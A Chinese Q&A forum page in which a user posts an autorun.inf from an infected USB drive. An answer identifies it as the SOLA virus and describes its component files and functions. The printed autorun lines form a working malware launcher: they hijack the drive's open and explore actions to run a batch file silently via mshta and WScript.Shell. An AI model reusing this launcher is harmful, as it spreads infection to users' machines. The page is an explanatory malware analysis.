SOLA_1.0_2.0
[autorun]
shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell=打开(&O)
shell\open=复制磁盘(&C)
shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
帮我看下这段代码是什么意思!,高手请进。
答案:1 悬赏:0 手机版
解决时间 2021-07-18 18:51
- 提问者网友:感性作祟
- 2021-07-18 04:39
最佳答案
- 五星知识达人网友:山河有幸埋战骨
- 2021-07-18 04:44
从autorun中可以看出,是通过系统VBS来调用带有参数的SOLA.bat文件,看来一切的奥秘都在那个文件里了。 打开SOLA.bat,里面内容很多,让我感觉似乎这个文件就能实现病毒的大多数功能。
u盘中毒了吧、、、
1、Autorun.inf 这个不用多说,是病毒自动运行的autorun文件的副本,和感染后的autorun一模一样
2、docpack.dll,exepack.dll,jpgpack.dll,txtpack.dll 这四个文件是感染4类文件的功能文件,原来还以为也是压缩包,后来发现不是,留待以后继续研究
3、Rar.exe 这个是Winrar的DOS命令文件,可以从任何已安装的Winrar目录下获取,病毒自带可以方便完成各种解压操作
4、sleep.exe 功能不明,体积很小,留待以后研究
5、SOLA.BAT 和外面的同名文件一样,是副本
6、infect.bat,LocalScan.bat,readlnk.bat,RecentInf.bat,scan.bat SOLA文件需要调用的功能模块,同时完成病毒的所有功能,包括驻留内存、添加启动项,系统中留后门、感染那4类文件,检测可移动设备等
7、Tasks.xxx,TDPack.txt,EJPack.txt 可能是某些代码的副本,应该在SOLA.BAT中能得到解释
8、TENBATSU.BAT 在这个文件中,病毒制作者留下了他的讯息,我们可以通过这个吓唬人的批处理,感受到病毒制作者的心情。内容如下(一些代码部分省略):
我要举报
如以上回答内容为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
点此我要举报以上问答信息
大家都在看
推荐资讯